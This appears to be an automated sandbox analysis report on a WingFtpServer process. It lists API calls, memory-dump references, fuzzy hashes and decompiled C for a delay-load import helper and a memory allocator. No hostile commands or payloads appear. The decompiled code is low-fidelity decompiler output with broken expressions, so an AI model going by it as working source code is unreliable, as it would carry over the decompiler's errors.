                                                                                                                                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 03AA84CE
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 03AA84D7
                                                                                                                                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,03AA854E,?,00000000,?,GetLogicalProcessorInformation), ref: 03AA8502
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                                                                                                                                                                  • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                                                                                                                                                  • API String ID: 1184211438-79381301
                                                                                                                                                                                                  • Opcode ID: a287b71bd89e65c796efabf1ecb7b9931c7354aae78dddbfc5b4a77a905e1697
                                                                                                                                                                                                  • Instruction ID: 06afd608c35d85b827994dd873f19d0c7cb812470514541ed5b3d6db0abe6849
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a287b71bd89e65c796efabf1ecb7b9931c7354aae78dddbfc5b4a77a905e1697
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6117F77D00B09AEDB14EBACC940A6DBBFCEF41200F0884ABDC149B241EB798A448A15
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AB0A68 Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                                                  			E03AB0A68(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x3bcec4c, 8 << 2);
				_pop(_t194);
				_v56 =  *0x3bcec4c;
				_v52 = E03AB0F18( *0x03BCEC50);
				_v48 = E03AB0F28( *0x03BCEC54);
				_v44 = E03AB0F38( *0x03BCEC58);
				_v40 = E03AB0F48( *0x03BCEC5C);
				_v36 = E03AB0F48( *0x03BCEC60);
				_v32 = E03AB0F48( *0x03BCEC64);
				_v28 =  *0x03BCEC68;
				memcpy( &_v92, 0x3bcec6c, 9 << 2);
				_t196 = _t194;
				_v88 = 0x3bcec6c;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x3bcec90; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E03AB0F58( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x3bd6644 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x3bd6644 != 0) {
							_t191 =  *0x3bd6644(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x3bd6648 != 0) {
									_t191 =  *0x3bd6648(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x3bcec98; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x3bd6644 != 0) {
						_t142 =  *0x3bd6644(1,  &_v92);
					}
					if(_t142 == 0) {
						_t142 = LoadLibraryA(_v80);
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E03AB0360(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x3bcec48; // 0xe298f8
									 *_v20 = _t126;
									 *0x3bcec48 = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x3bd6648 != 0) {
							_t142 =  *0x3bd6648(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x3bcec94; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x3bd6644(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x3bd6644 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x3bd6644(5,  &_v92);
						}
						return _t191;
					}
				}
			}







































                                                                                                                                                                                                  0x03ab0a7c
                                                                                                                                                                                                  0x03ab0a82
                                                                                                                                                                                                  0x03ab0a84
                                                                                                                                                                                                  0x03ab0a87
                                                                                                                                                                                                  0x03ab0a94
                                                                                                                                                                                                  0x03ab0aa1
                                                                                                                                                                                                  0x03ab0aae
                                                                                                                                                                                                  0x03ab0abb
                                                                                                                                                                                                  0x03ab0ac8
                                                                                                                                                                                                  0x03ab0ad5
                                                                                                                                                                                                  0x03ab0ade
                                                                                                                                                                                                  0x03ab0aec
                                                                                                                                                                                                  0x03ab0aee
                                                                                                                                                                                                  0x03ab0aef
                                                                                                                                                                                                  0x03ab0af5
                                                                                                                                                                                                  0x03ab0afb
                                                                                                                                                                                                  0x03ab0b02
                                                                                                                                                                                                  0x03ab0b04
                                                                                                                                                                                                  0x03ab0b0a
                                                                                                                                                                                                  0x03ab0b10
                                                                                                                                                                                                  0x03ab0b20
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ab0b25
                                                                                                                                                                                                  0x03ab0b32
                                                                                                                                                                                                  0x03ab0b37
                                                                                                                                                                                                  0x03ab0b39
                                                                                                                                                                                                  0x03ab0b3b
                                                                                                                                                                                                  0x03ab0b3b
                                                                                                                                                                                                  0x03ab0b41
                                                                                                                                                                                                  0x03ab0b44
                                                                                                                                                                                                  0x03ab0b4c
                                                                                                                                                                                                  0x03ab0b56
                                                                                                                                                                                                  0x03ab0b59
                                                                                                                                                                                                  0x03ab0b5e
                                                                                                                                                                                                  0x03ab0b79
                                                                                                                                                                                                  0x03ab0b60
                                                                                                                                                                                                  0x03ab0b6c
                                                                                                                                                                                                  0x03ab0b6c
                                                                                                                                                                                                  0x03ab0b7c
                                                                                                                                                                                                  0x03ab0b85
                                                                                                                                                                                                  0x03ab0b9e
                                                                                                                                                                                                  0x03ab0ba0
                                                                                                                                                                                                  0x03ab0c62
                                                                                                                                                                                                  0x03ab0c62
                                                                                                                                                                                                  0x03ab0c6c
                                                                                                                                                                                                  0x03ab0c7a
                                                                                                                                                                                                  0x03ab0c7a
                                                                                                                                                                                                  0x03ab0c7e
                                                                                                                                                                                                  0x03ab0ccb
                                                                                                                                                                                                  0x03ab0ccd
                                                                                                                                                                                                  0x03ab0cd4
                                                                                                                                                                                                  0x03ab0cde
                                                                                                                                                                                                  0x03ab0cec
                                                                                                                                                                                                  0x03ab0cec
                                                                                                                                                                                                  0x03ab0cf0
                                                                                                                                                                                                  0x03ab0cf2
                                                                                                                                                                                                  0x03ab0cf7
                                                                                                                                                                                                  0x03ab0cfd
                                                                                                                                                                                                  0x03ab0d0d
                                                                                                                                                                                                  0x03ab0d12
                                                                                                                                                                                                  0x03ab0d12
                                                                                                                                                                                                  0x03ab0cf0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ab0c80
                                                                                                                                                                                                  0x03ab0c84
                                                                                                                                                                                                  0x03ab0cbf
                                                                                                                                                                                                  0x03ab0cc9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ab0c8c
                                                                                                                                                                                                  0x03ab0c8f
                                                                                                                                                                                                  0x03ab0c97
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ab0cb0
                                                                                                                                                                                                  0x03ab0cb6
                                                                                                                                                                                                  0x03ab0cbb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ab0d15
                                                                                                                                                                                                  0x03ab0d18
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ab0d18
                                                                                                                                                                                                  0x03ab0c97
                                                                                                                                                                                                  0x03ab0c84
                                                                                                                                                                                                  0x03ab0c7e
                                                                                                                                                                                                  0x03ab0bad
                                                                                                                                                                                                  0x03ab0bbb
                                                                                                                                                                                                  0x03ab0bbb
                                                                                                                                                                                                  0x03ab0bbf
                                                                                                                                                                                                  0x03ab0bca
                                                                                                                                                                                                  0x03ab0bca
                                                                                                                                                                                                  0x03ab0bce
                                                                                                                                                                                                  0x03ab0c1b
                                                                                                                                                                                                  0x03ab0c27
                                                                                                                                                                                                  0x03ab0c5d
                                                                                                                                                                                                  0x03ab0c29
                                                                                                                                                                                                  0x03ab0c2d
                                                                                                                                                                                                  0x03ab0c33
                                                                                                                                                                                                  0x03ab0c38
                                                                                                                                                                                                  0x03ab0c3d
                                                                                                                                                                                                  0x03ab0c44
                                                                                                                                                                                                  0x03ab0c4a
                                                                                                                                                                                                  0x03ab0c4f
                                                                                                                                                                                                  0x03ab0c54
                                                                                                                                                                                                  0x03ab0c54
                                                                                                                                                                                                  0x03ab0c3d
                                                                                                                                                                                                  0x03ab0c2d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ab0bd0
                                                                                                                                                                                                  0x03ab0bd5
                                                                                                                                                                                                  0x03ab0bdf
                                                                                                                                                                                                  0x03ab0bed
                                                                                                                                                                                                  0x03ab0bed
                                                                                                                                                                                                  0x03ab0bf1
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ab0bf3
                                                                                                                                                                                                  0x03ab0bf3
                                                                                                                                                                                                  0x03ab0bf8
                                                                                                                                                                                                  0x03ab0bfe
                                                                                                                                                                                                  0x03ab0c0e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ab0c13
                                                                                                                                                                                                  0x03ab0bf1
                                                                                                                                                                                                  0x03ab0b87
                                                                                                                                                                                                  0x03ab0b93
                                                                                                                                                                                                  0x03ab0b97
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ab0b99
                                                                                                                                                                                                  0x03ab0d1a
                                                                                                                                                                                                  0x03ab0d21
                                                                                                                                                                                                  0x03ab0d25
                                                                                                                                                                                                  0x03ab0d28
                                                                                                                                                                                                  0x03ab0d2b
                                                                                                                                                                                                  0x03ab0d34
                                                                                                                                                                                                  0x03ab0d34
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ab0d3a
                                                                                                                                                                                                  0x03ab0b97

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 03AB0B20
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                  • Opcode ID: 0f7027a5bd965bfde85d2f1ee707699c955e296c5cf774828aef2658bba98e23
                                                                                                                                                                                                  • Instruction ID: 7b30fa3e3ee44e83fd8e569b6739a9fd2d6254970e278c2bb7e667cffbce1c3b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f7027a5bd965bfde85d2f1ee707699c955e296c5cf774828aef2658bba98e23
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FA17D75A003099FDB24DFA8D984BEFB7B9FB48314F14412EE505AB386DB70A945CB60
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AA596C Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 298sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                                                  			E03AA596C(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				intOrPtr* _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				intOrPtr* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				intOrPtr* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x3bd305d; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t121 = VirtualAlloc(0, _t156, 0x101000, 4);
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E03AA56CC();
								_t99 =  *0x3bd5b84; // 0x3bd5b80
								 *_t147 = 0x3bd5b80;
								 *0x3bd5b84 = _t121;
								 *((intOrPtr*)(_t147 + 4)) = _t99;
								 *_t99 = _t121;
								 *0x3bd5b7c = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x3bd3aec], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x3bd398d;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x3bd3aec], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x3bd3afc + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x3bd3af8;
							if((0xfffffffe << _t132 &  *0x3bd3af8) == 0) {
								_t133 =  *0x3bd3af4; // 0xd2e40
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E03AA5650(_t125);
								} else {
									_t110 =  *0x3bd3af0; // 0x3eb2e50
									_t109 = _t110 - _t125;
									 *0x3bd3af0 = _t109;
									 *0x3bd3af4 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x3bd3aec = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x3bd3b7c + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x3bd3afc + _t142 * 4;
								 *_t80 =  *(0x3bd3afc + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x3bd3af8], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E03AA5584(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x3bd3aec = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x3bd3994; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x3bce074 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x3bd398d;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x3bd305d;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x3bd3aec], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x3bd398d;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x3bd3aec], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x3bd3af8;
							__eflags =  *(__ebx + 1) &  *0x3bd3af8;
							if(( *(__ebx + 1) &  *0x3bd3af8) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x3bd3af4; // 0xd2e40
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E03AA5650(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x3bd3aec = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x3bd3af0; // 0x3eb2e50
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x3bd3af4 =  *0x3bd3af4 - __edi;
									 *0x3bd3af0 = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x3bd3afc + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x3bd3afc + __eax * 4) + __eax * 8 * 4;
								__edi = 0x3bd3b7c + ( *(0x3bd3afc + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x3bd3afc + __eax * 4;
									 *_t38 =  *(0x3bd3afc + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x3bd3af8], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E03AA5584(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0xd2e46
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x3bd3aec = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x3eb2e70
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}





























                                                                                                                                                                                                  0x03aa596c
                                                                                                                                                                                                  0x03aa5978
                                                                                                                                                                                                  0x03aa597e
                                                                                                                                                                                                  0x03aa5bcc
                                                                                                                                                                                                  0x03aa5bd1
                                                                                                                                                                                                  0x03aa5ce4
                                                                                                                                                                                                  0x03aa5ce5
                                                                                                                                                                                                  0x03aa5ce7
                                                                                                                                                                                                  0x03aa5718
                                                                                                                                                                                                  0x03aa571c
                                                                                                                                                                                                  0x03aa571e
                                                                                                                                                                                                  0x03aa5728
                                                                                                                                                                                                  0x03aa573d
                                                                                                                                                                                                  0x03aa5741
                                                                                                                                                                                                  0x03aa5743
                                                                                                                                                                                                  0x03aa5745
                                                                                                                                                                                                  0x03aa574b
                                                                                                                                                                                                  0x03aa574e
                                                                                                                                                                                                  0x03aa5753
                                                                                                                                                                                                  0x03aa5758
                                                                                                                                                                                                  0x03aa575e
                                                                                                                                                                                                  0x03aa5764
                                                                                                                                                                                                  0x03aa5767
                                                                                                                                                                                                  0x03aa5769
                                                                                                                                                                                                  0x03aa5770
                                                                                                                                                                                                  0x03aa5770
                                                                                                                                                                                                  0x03aa5779
                                                                                                                                                                                                  0x03aa5ced
                                                                                                                                                                                                  0x03aa5ced
                                                                                                                                                                                                  0x03aa5cef
                                                                                                                                                                                                  0x03aa5cef
                                                                                                                                                                                                  0x03aa5bd7
                                                                                                                                                                                                  0x03aa5bd7
                                                                                                                                                                                                  0x03aa5be3
                                                                                                                                                                                                  0x03aa5be6
                                                                                                                                                                                                  0x03aa5be8
                                                                                                                                                                                                  0x03aa5b90
                                                                                                                                                                                                  0x03aa5b95
                                                                                                                                                                                                  0x03aa5b9d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5b9f
                                                                                                                                                                                                  0x03aa5ba1
                                                                                                                                                                                                  0x03aa5ba8
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5baa
                                                                                                                                                                                                  0x03aa5bac
                                                                                                                                                                                                  0x03aa5bb6
                                                                                                                                                                                                  0x03aa5bbe
                                                                                                                                                                                                  0x03aa5bc2
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5bc2
                                                                                                                                                                                                  0x03aa5bbe
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5ba8
                                                                                                                                                                                                  0x03aa5b90
                                                                                                                                                                                                  0x03aa5bea
